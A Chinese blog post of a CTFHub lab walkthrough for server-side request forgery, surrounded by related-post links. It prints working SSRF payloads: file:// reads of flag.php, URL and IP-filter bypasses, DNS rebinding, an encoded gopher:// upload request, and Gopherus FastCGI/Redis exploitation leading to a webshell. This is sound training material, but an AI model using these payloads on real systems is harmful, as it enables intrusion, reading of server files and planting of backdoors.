CTFhub-WEB-SSRF

已于 2024-07-30 09:16:12 修改
阅读量393 收藏 8
点赞数 11
文章标签: 网络安全
于 2024-07-29 22:41:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/140782985
版权

CTFHub

一、内网访问

尝试访问位于127.0.0.1的flag.php吧

/?url=http://127.0.0.1/flag.php

二、伪协议读取文件

尝试去读取一下Web目录下的flag.php

/?url=file:///var/www/html/flag.php

查看源代码

三、端口扫描

来试试CTFHub在线扫端口,据说端口范围是8000-9000

 /?url=127.0.0.1:8000

第一步 对输入的页面进行抓包

第二步进行暴力破解

四、URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限 制吧 原则@绕过

/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

五、数字IP Bypass

输入http://127.0.0.1/flag.php

ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1

绕过

127.0.0.1–>localhost
127.0.0.1–>7F000001 十六进制
127.0.0.1–>2130706433 十进制
127.0.0.1–>2130706433 Enclosed Alphanumerics
/?url=www.imuhan.com/flag.php

六、302跳转 Bypass

文件读取一下试试

?url=file:///var/www/html/index.php

输入http://127.0.0.1/flag.php

发现禁用ip127.0.0.1

饶过

?url=http://0.0.0.0/flag.php
?url=http://localhost/flag.php

七、DNS重绑定 Bypass

输入http://127.0.0.1/flag.php

rbndr.us dns rebinding service

打开此网站,获取内网IP的域名并访问

并将第二个修改为127.0.0.2

网址输入

?url=http://7f000001.7f000002.rbndr.us/flag.php

八、POST

访问flag.php

查看源代码

将key输入到框内

回车抓包

删除多余部分留下host,type,lengthhost 改为127.0.0.1:80

复制代码进行二次编码,第一次编码后将%0A转换为%0D%0A结尾加%0D%0A

输入到框内访问

九、上传文件

通过 file:// 伪协议来读取 flag.php 源代码

/?url=file:///var/www/html/flag.php

检查源代码

源代码添加

<input type="submit" name="submit"

得到提交

提交抓包

和上一题一直进行编码

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520292%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D----WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250A%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522test.txt%2522%250D%250AContent-Type%253A%2520text/plain%250D%250A%250D%250ASSRF%2520Upload%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY--

十、FastCGI协议

打开kali

使用Gopherus工具生成payload

python2 gopherus.py --exploit fastcgi

将生成的gopher进行url编码在次访问页面获得falg

在Kili里再次执行

输入到搜素框后出现

十一、Redis协议

步骤一:和第十题同理 Gopherus 并生成攻击载荷...

python2 gopherus.py --exploit redis

进行编码

输入到框内

打开蚁剑把目标栏地址输入密码为一句话密码

mouyu⇔
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHUB-web-SSRF
ookami6497的博客
03-25 870
CTFHUB-web-ssrf
CTFHub-Web-SSRF
IceCream的博客
04-29 1941
1.题目提示说访问127.0.0.1的flag.php,在URL后面添加路径没想到直接访问成功。
CTFHub-Web-SSRF解题过程
2401_86440467的博客
08-10 1195
开启环境访问后,url=后添加如下,得到flag。
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6737
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
2401_85783544的博客
07-24 1035
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
ctfhub-web-SSRF通关攻略
2401_82451607的博客
08-27 2086
ctfhub-web-SSRF通关攻略
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1063
CTFHub技能树-web-ssrf
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 3040
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2031
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 958
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
CTFHUB-WEB-SSRF【10】内网访问 伪协议读取文件 端口扫描
(∪.∪ )...zzz的博客
06-13 765
看我内网访问直接访问127.0.0.1/flag.php伪协议读取文件file:///var/www/html/flag.php端口扫描?url=dict://127.0.0.1:端口号burp 爆破 内网访问 直接访问127.0.0.1/flag.php ?url=127.0.0.1/flag.php ctfhub{a10924e3925b415219119faa} 伪协议读取文件 file:///var/www/html/flag.php 端口扫描 ?url=dict://127.0.0.1:
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3947
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7096
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8446
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
非常领先的分布式数据库Oceanbase OBCP 3.0培训教材
09-05
非常领先的分布式数据库Oceanbase OBCP 3.0培训教材
GCN海面目标检测.zip
09-05
目标检测(Object Detection)是计算机视觉领域的一个核心问题,其主要任务是找出图像中所有感兴趣的目标(物体),并确定它们的类别和位置。以下是对目标检测的详细阐述: 一、基本概念 目标检测的任务是解决“在哪里?是什么?”的问题,即定位出图像中目标的位置并识别出目标的类别。由于各类物体具有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具挑战性的任务之一。 二、核心问题 目标检测涉及以下几个核心问题: 分类问题:判断图像中的目标属于哪个类别。 定位问题:确定目标在图像中的具体位置。 大小问题:目标可能具有不同的大小。 形状问题:目标可能具有不同的形状。 三、算法分类 基于深度学习的目标检测算法主要分为两大类: Two-stage算法:先进行区域生成(Region Proposal),生成有可能包含待检物体的预选框(Region Proposal),再通过卷积神经网络进行样本分类。常见的Two-stage算法包括R-CNN、Fast R-CNN、Faster R-CNN等。 One-stage算法:不用生成区域提议,直接在网络中提取特征来预测物体分类和位置。常见的One-stage算法包括YOLO系列(YOLOv1、YOLOv2、YOLOv3、YOLOv4、YOLOv5等)、SSD和RetinaNet等。 四、算法原理 以YOLO系列为例,YOLO将目标检测视为回归问题,将输入图像一次性划分为多个区域,直接在输出层预测边界框和类别概率。YOLO采用卷积网络来提取特征,使用全连接层来得到预测值。其网络结构通常包含多个卷积层和全连接层,通过卷积层提取图像特征,通过全连接层输出预测结果。 五、应用领域 目标检测技术已经广泛应用于各个领域,为人们的生活带来了极大的便利。以下是一些主要的应用领域: 安全监控:在商场、银行
算法模板,最科学的刷题方式,最快速的刷题路径,你值得拥有~.zip
最新发布
09-05
算法模板,最科学的刷题方式,最快速的刷题路径,你值得拥有~.zip 算法模板,最科学的刷题方式,最快速的刷题路径,一个月从入门到 offer,你值得拥有 算法模板顾名思义就是刷题的套路模板,掌握了刷题模板之后,刷题也变得好玩起来了~
全球与中国绿色螯合剂市场现状及未来发展趋势(2024版).docx
09-05
全球与中国绿色螯合剂市场现状及未来发展趋势(2024版).docx
CTFHub ssrf
07-29
所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值